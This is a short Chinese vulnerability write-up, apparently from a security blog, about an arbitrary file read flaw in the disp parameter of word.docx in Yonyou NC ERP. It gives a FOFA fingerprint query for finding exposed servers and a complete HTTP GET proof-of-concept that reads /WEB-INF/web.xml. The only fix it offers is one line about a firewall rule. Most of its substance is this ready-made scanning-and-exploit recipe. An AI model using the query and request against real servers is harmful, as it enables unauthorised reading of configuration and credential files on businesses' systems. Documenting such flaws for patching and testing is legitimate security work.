用友NC word.docx任意文件读取漏洞

文章目录

产品简介

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理

漏洞概述

用友NC在word.docx的disp参数存在任意文件读取漏洞

指纹识别

fofa:

python 复制代码
app="用友-UFIDA-NC"

漏洞利用

Poc:

python 复制代码
GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0

修复建议

临时缓解措施:在应用防火墙上配置 禁止访问word.docx接口策略

【其实吵架从来没有输赢的,或者说都是输。】

相关推荐
vortex513 分钟前
Nuclei PoC 编写详解:从入门到实践
安全·web安全·网络安全·渗透测试
风痕~~1 小时前
java实现word末尾添加图片的两种方式
java·word
不坑老师1 小时前
MarkDown语法在Word中怎么渲染?不坑盒子2025年6月8日,支持一键渲染MarkDwon了,表格、公式、图片……都可以!
word
你挚爱的强哥2 小时前
Blob设置type为application/msword将document DOM节点转换为Word(.doc,.docx),并下载到本地
开发语言·c#·word
渗透好难4 小时前
CTF show Web 红包题第六弹
web安全·网络安全·前端框架·网络攻击模型
&_@4 小时前
vulnyx Blogger writeup
网络安全·vulnyx靶机
gsls2008086 小时前
使用xdocreport导出word
前端·python·word
Johny_Zhao6 小时前
基于CentOS Stream 8的物联网数据采集与展示方案
linux·网络·python·mqtt·mysql·网络安全·信息安全·云计算·shell·yum源·系统运维
炎码工坊14 小时前
微服务通信安全实战:JWT在分布式架构中的应用与最佳实践
安全·网络安全·云原生·系统安全·安全架构
2501_9151063218 小时前
iOS性能调优实战:借助克魔(KeyMob)与常用工具深度洞察App瓶颈
websocket·网络协议·tcp/ip·http·网络安全·https·udp